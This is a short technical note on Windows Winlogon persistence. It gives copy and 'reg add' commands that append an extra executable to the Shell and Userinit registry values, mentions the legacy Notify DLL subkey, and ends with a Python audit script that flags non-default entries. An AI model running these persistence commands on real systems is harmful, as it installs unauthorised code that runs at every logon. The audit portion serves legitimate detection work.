Winlogon is the Windows component that handles logon-related activity such as logon, logoff and loading the user profile. Its behaviour is configured through registry values, and those same values can be used for persistence.

Winlogon has two registry values under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon that can be used for persistence: Shell and Userinit.

Shell is the program started as the user's shell at logon (explorer.exe by default), and Userinit is the program Winlogon runs to initialise the user's session (userinit.exe by default). Both values are comma-separated lists, so an additional executable can be appended after the legitimate entry.

For Shell, the executable is first copied somewhere on the search path (here System32) and then appended to the Shell value after explorer.exe, so the normal shell still starts:

copy c:\executable.exe c:\windows\system32
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Shell" /T REG_SZ /D "explorer.exe,executable.exe" /F

For Userinit, the full path of the executable is appended after the legitimate userinit.exe entry:

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "UserInit" /T REG_SZ /D "C:\Windows\system32\userinit.exe,c:\windows\system32\executable.exe" /F

The Notify subkey under the same Winlogon key exists on older versions of Windows and holds notification packages: each entry points to a DLL that handles Winlogon events. A DLL entry added under this key is loaded by Winlogon during logon.
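As a defensive counterpart, the following audit script is an added example (not part of the original notes) that checks the three locations described above and reports anything beyond the stock values. It assumes a default install where Shell is explorer.exe and Userinit is C:\Windows\system32\userinit.exe, and compares entries literally, so a legitimate but non-default path is also reported for review. The sample values are constructed to mirror what the commands above write.

```python
WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Stock values on a default install; compared case-insensitively after splitting on commas.
EXPECTED = {"Shell": {"explorer.exe"}, "Userinit": {r"c:\windows\system32\userinit.exe"}}

# Constructed sample mirroring the values the commands above write (not a live read).
SAMPLE_VALUES = {"Shell": "explorer.exe,executable.exe",
                 "Userinit": r"C:\Windows\system32\userinit.exe,c:\windows\system32\executable.exe"}

def split_entries(value):
    """Lower-cased, non-empty entries of a comma-separated value (stock Userinit ends in a comma)."""
    return [p.strip().strip('"').lower() for p in value.split(",") if p.strip()]

def unexpected_entries(name, value):
    """Entries of a Shell or Userinit value that are not part of the stock default."""
    return [e for e in split_entries(value) if e not in EXPECTED[name]]

def audit_winlogon(values, notify_packages=None):
    """values: {"Shell": ..., "Userinit": ...} read from the Winlogon key;
    notify_packages: {subkey: DllName} read from Winlogon\\Notify, if that key exists.
    Returns a dict of findings; an empty dict means nothing deviates from the defaults."""
    findings = {}
    for name in EXPECTED:
        extra = unexpected_entries(name, values.get(name, ""))
        if extra:
            findings[name] = extra
    # Notify packages are not supported on Vista and later, so any entry deserves review.
    if notify_packages:
        findings["Notify"] = dict(notify_packages)
    return findings

def read_live_winlogon():
    """Read the live values under HKLM (Windows only, via the stdlib winreg module)."""
    import winreg
    values, notify = {}, {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY) as key:
        for name in EXPECTED:
            try:
                values[name] = winreg.QueryValueEx(key, name)[0]
            except FileNotFoundError:
                pass  # value absent: the built-in default applies
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY + r"\Notify") as nkey:
            for i in range(winreg.QueryInfoKey(nkey)[0]):
                sub = winreg.EnumKey(nkey, i)
                with winreg.OpenKey(nkey, sub) as skey:
                    notify[sub] = winreg.QueryValueEx(skey, "DllName")[0]
    except FileNotFoundError:
        pass  # no Notify key: normal on current Windows versions
    return values, notify
```

On a Windows host, `audit_winlogon(*read_live_winlogon())` runs the check against the live HKLM key; `audit_winlogon(SAMPLE_VALUES)` shows the result for the constructed sample.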


